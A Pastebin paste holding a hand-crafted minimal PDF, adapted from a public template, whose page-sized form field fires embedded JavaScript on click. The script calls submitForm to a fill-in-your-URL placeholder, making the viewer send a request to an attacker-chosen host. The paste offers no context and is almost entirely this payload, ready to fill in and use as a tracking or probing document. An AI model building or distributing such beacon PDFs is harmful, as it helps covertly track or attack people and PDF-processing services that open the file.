Advertisement
Guest User

Untitled

a guest
Oct 14th, 2019
1,347
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.91 KB | None | 0 0
  1. %PDF-1.1
  2. 1 0 obj
  3. <<
  4. % /Type /Catalog
  5. /Pages 2 0 R
  6. >>
  7. endobj
  8.  
  9. 124 0 obj
  10. <<
  11. /F 4
  12. /FT /Tx
  13. /Rect [ 0 0 1024 1024 ]
  14. /Subtype /Widget /T (Here we have a form field) /Type /Annot /AA
  15. <<
  16. /D <<
  17. /Type /Action /S /JavaScript
  18. /JS (
  19. try{
  20. app.alert("Debug alert");
  21. this.submitForm("###########<YOUR URL>############");
  22. } catch(e)
  23. {app.alert(e)}
  24. )
  25. >>
  26. >>
  27. >>
  28. endobj
  29.  
  30.  
  31. 2 0 obj
  32. <<
  33. /Type /Pages
  34. /Count 1
  35. /Kids [ 3 0 R ]
  36. >>
  37. endobj
  38.  
  39. 3 0 obj
  40. <<
  41. /Type /Page
  42. /Contents 4 0 R
  43. /Annots [124 0 R]
  44. /Parent 2 0 R
  45. /Resources <<
  46. /Font <<
  47. /F1 <<
  48. /Type /Font
  49. /Subtype /Type1
  50. /BaseFont /Arial
  51. >>
  52. >>
  53. >>
  54. >>
  55. endobj
  56.  
  57. 4 0 obj
  58. <<
  59. >>
  60. stream
  61. BT
  62. /F1 100
  63. Tf 1 1 1 1 1 0
  64. Tr(Hello World!)Tj
  65. ET
  66. endstream
  67. endobj
  68.  
  69.  
  70. trailer
  71. <<
  72. /Root 1 0 R
  73. >>
  74. %%EOF
  75. % a naive PDF (for pdf.js) with more elements than usually required
  76. % Ange Albertini, BSD licence 2012
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement